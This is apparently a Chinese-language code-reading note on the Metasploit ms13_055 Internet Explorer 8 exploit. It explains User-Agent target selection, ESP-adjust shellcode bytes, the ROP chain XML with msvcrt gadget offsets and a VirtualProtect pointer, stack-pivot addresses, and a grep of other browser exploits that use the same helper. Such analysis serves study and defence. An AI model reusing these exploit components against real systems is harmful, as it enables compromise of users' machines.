
ms13_055 metasploit

111   def get_payload(t)112     if t[‘Rop‘] == :msvcrt113       print_status("Using msvcrt ROP")114       esp_align = "\x81\xc4\x54\xf2\xff\xff"115       rop_dll = ‘msvcrt‘116       opts    = {‘target‘=>‘xp‘}117     else118       print_status("Using JRE ROP")119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000120       rop_dll = ‘java‘121       opts    = {}122     end

  

daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 C4 54 F2 FF FF    add esp, 0xFFFFF254

  

daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF    sub esp, 0xFFFFD8F0

  

esp_align 中的机器码是一段在 shellcode 之前执行的栈指针调整指令：msvcrt 版本是 `add esp, 0xFFFFF254`（即 esp -= 0xDAC），JRE 版本是 `sub esp, 0xFFFFD8F0`（即 esp += 10000，对应源码注释 `sub esp, -10000`）。它做的并不是字节对齐，而是把 ESP 从 ROP 链执行后所处的位置挪开一段距离，使 payload 自身的 push/call 不会覆盖正在执行的 ROP 链和 shellcode（具体偏移量与各自 ROP 链的栈布局相关，仅从这段片段无法完全确认）。


 

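  # Pick the exploit target for a browser from its User-Agent string.
  #
  # If the operator selected a specific target it is returned as-is; only the
  # 'Automatic' target triggers fingerprinting. The fingerprint is a best-effort
  # heuristic: the User-Agent is chosen by the client, so it may be absent,
  # forged, or describe an OS/browser pair this module has no target for.
  #
  # @param agent [String, nil] value of the request's User-Agent header
  # @return [Msf::Module::Target, nil] the first target whose name contains
  #   both the detected IE version and OS name, or nil when nothing matches
  #   (callers are expected to treat nil as "no usable target")
  def get_target(agent)
    return target if target.name != 'Automatic'

    # A missing header arrives as nil; coerce so the scans below cannot raise.
    ua = agent.to_s
    nt = ua.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = ua.scan(/MSIE (\d)/).flatten[0] || ''

    # Only the OS versions we have a ROP chain for map to a target name; any
    # other NT version (Vista, Windows 8, ...) leaves os_name nil.
    os_name =
      case nt
      when '5.1' then 'Windows XP SP3'
      when '6.1' then 'Windows 7'
      end

    # Without both halves of the fingerprint there is nothing to match on.
    # Returning early also avoids String#include?(nil), which raised TypeError
    # in the original for any NT version not handled above.
    return nil if ie.empty? || os_name.nil?

    ie_name = "IE #{ie}"
    targets.find { |t| t.name.include?(ie_name) && t.name.include?(os_name) }
  end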

  

188   def on_request_uri(cli, request)189     agent = request.headers[‘User-Agent‘]190     t = get_target(agent)

  

当远程的网页客户端请求该页面时，on_request_uri 取出请求头中的 User-Agent 交给 get_target；后者用正则从中提取 Windows NT 版本（5.1 → Windows XP SP3，6.1 → Windows 7）和 IE 主版本号，再在预设的 Targets 列表中查找名字同时包含这两者的目标，并返回与该版本对应的 ROP/pivot 数据。需要注意 User-Agent 完全由客户端提供，可以缺失或伪造，所以这种自动选择只是尽力而为的启发式。另外原始代码里当 NT 版本既不是 5.1 也不是 6.1 时 os_name 为 nil，`t.name.include?(nil)` 会抛出 TypeError，而不是安静地返回 nil。

 52       ‘Targets‘        => 53         [ 54           [ ‘Automatic‘, {} ], 55           [ 56             ‘IE 8 on Windows XP SP3‘, 57             { 58               ‘Rop‘   => :msvcrt, 59               ‘Pivot‘ => 0x77c15ed5, # xchg eax, esp; ret 60               ‘Align‘ => 0x77c4d801  # add esp, 0x2c; ret 61             } 62           ], 63           [ 64             ‘IE 8 on Windows 7‘, 65             { 66               ‘Rop‘   => :jre, 67               ‘Pivot‘ => 0x7c348b05, # xchg eax, esp; ret 68               ‘Align‘ => 0x7C3445F8  # add esp, 0x2c; ret 69             } 70           ] 71         ],

  

如果当前的系统/浏览器组合没有匹配的目标，get_target 返回 nil，模块随即返回 404 页面（处理 nil 的分支在上面的 on_request_uri 片段中没有列出）。


 

  # Build the ROP chain plus shellcode buffer for the chosen target.
  #
  # @param t [Msf::Module::Target] target selected by get_target; its 'Rop'
  #   key decides which gadget set is used (:msvcrt, otherwise the JRE chain)
  # @return [String] result of generate_rop_payload: gadgets followed by the
  #   stack-adjust stub, the encoded payload and 12000 bytes of alpha padding
  def get_payload(t)
    use_msvcrt = (t['Rop'] == :msvcrt)

    print_status(use_msvcrt ? "Using msvcrt ROP" : "Using JRE ROP")

    # Stack-adjust stub executed before the shellcode proper. msvcrt:
    # add esp, 0xFFFFF254 (esp -= 0xDAC); JRE: sub esp, 0xFFFFD8F0 (sub esp,
    # -10000, i.e. esp += 10000). Both move ESP away from the ROP chain.
    esp_align = use_msvcrt ? "\x81\xc4\x54\xf2\xff\xff" : "\x81\xEC\xF0\xD8\xFF\xFF"
    rop_dll   = use_msvcrt ? 'msvcrt' : 'java'
    opts      = use_msvcrt ? {'target'=>'xp'} : {}

    # Random alpha padding is appended after the shellcode; its length feeds
    # the :size-style reserved words in the chain via payload.length.
    buf = esp_align + payload.encoded + rand_text_alpha(12000)
    generate_rop_payload(rop_dll, buf, opts)
  end

  

generate_rop_payload

  # Resolve a named ROP chain into bytes and prepend/append the caller's data.
  #
  # The chain returned by select_rop is a list of integers and reserved-word
  # symbols. Each symbol is replaced here: :nop becomes a 4-byte sled (or
  # 0x90909090 when no NOP generator is given), :junk a 4-byte random filler,
  # :size the payload length, and :unsafe_negate_size / :safe_negate_size the
  # corresponding transforms of that length.
  #
  # @param rop [String] chain name passed to select_rop (e.g. 'msvcrt', 'java')
  # @param payload [String] data placed after the chain; its length is what
  #   the size reserved words see
  # @param opts [Hash] 'nop', 'badchars', 'pivot', 'target', 'base'
  # @return [String] pivot + packed chain + payload
  # @raise [RuntimeError] when the selected chain packs to an empty string
  def generate_rop_payload(rop, payload, opts={})
    nop      = opts['nop']
    badchars = opts['badchars'] || ''
    pivot    = opts['pivot']    || ''
    target   = opts['target']   || ''
    base     = opts['base']

    chain = select_rop(rop, {'target'=>target, 'base'=>base})

    # Expand reserved words; anything else is already a gadget address/value.
    resolved = chain.map do |entry|
      case entry
      when :nop
        nop ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
      when :junk
        Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
      when :size
        payload.length
      when :unsafe_negate_size
        get_unsafe_size(payload.length)
      when :safe_negate_size
        get_safe_size(payload.length)
      else
        entry
      end
    end

    # Little-endian 32-bit words, as the x86 stack expects.
    packed = resolved.pack("V*")

    raise RuntimeError, "No ROP chain generated successfully" if packed.empty?

    pivot + packed + payload
  end

  

generate_rop_payload 通过 select_rop 取得 data 目录下预定义的 [module].xml 中与 target 匹配的 gadget 列表（文件查找逻辑在 select_rop 内部，此处未列出），然后把列表里的保留字展开：:nop 展开为 4 字节 NOP sled（未提供 nop 生成器时为 0x90909090），:junk 展开为 4 字节随机填充，:size / :unsafe_negate_size / :safe_negate_size 则按传入 payload 的长度计算（在 ms13_055 中这个长度包含 esp_align 和 12000 字节随机填充），最后按小端 32 位打包，以 pivot + gadgets + payload 的形式返回；若打包结果为空则抛出 RuntimeError。

<rop>
  <compatibility>
    <target>WINDOWS XP SP2</target>
    <target>WINDOWS XP SP3</target>
  </compatibility>

  <gadgets base="0x77c10000">
    <gadget offset="0x0002b860">POP EAX # RETN</gadget>
    <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
    <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
    <gadget value="junk">JUNK</gadget>
    <gadget offset="0x0001362c">POP EBX # RETN</gadget>
    <gadget offset="0x0004d9bb">Writable location</gadget>
    <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
    <gadget offset="0x00040d13">POP EDX # RETN</gadget>
    <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
    <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
    <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
    <gadget value="junk">JUNK</gadget>
    <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
    <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
    <gadget offset="0x0002ee15">skip 4 bytes</gadget>
    <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
    <gadget offset="0x0004d9bb">Writable location</gadget>
    <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
    <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
    <gadget offset="0x0002a184">POP ESI # RETN</gadget>
    <gadget offset="0x0001aacc">JMP [EAX]</gadget>
    <gadget offset="0x0002b860">POP EAX # RETN</gadget>
    <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
    <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
    <gadget offset="0x00025459">ptr to 'push esp #  ret</gadget>
  </gadgets>
</rop>

  


 

在 Windows 浏览器类 exploit 模块目录中查找 generate_rop_payload 的所有调用点（可以看出各模块分别使用 msvcrt、java、hxds、flash、reader 等不同的 ROP 链）：

daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120:      p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130:      p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135:    code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153:      code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65:    p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload('msvcrt', code,  {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137:      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144:      rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519:    generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133:      rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137:      rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97:    p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85:    p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143:      code = generate_rop_payload('java', payload.encoded)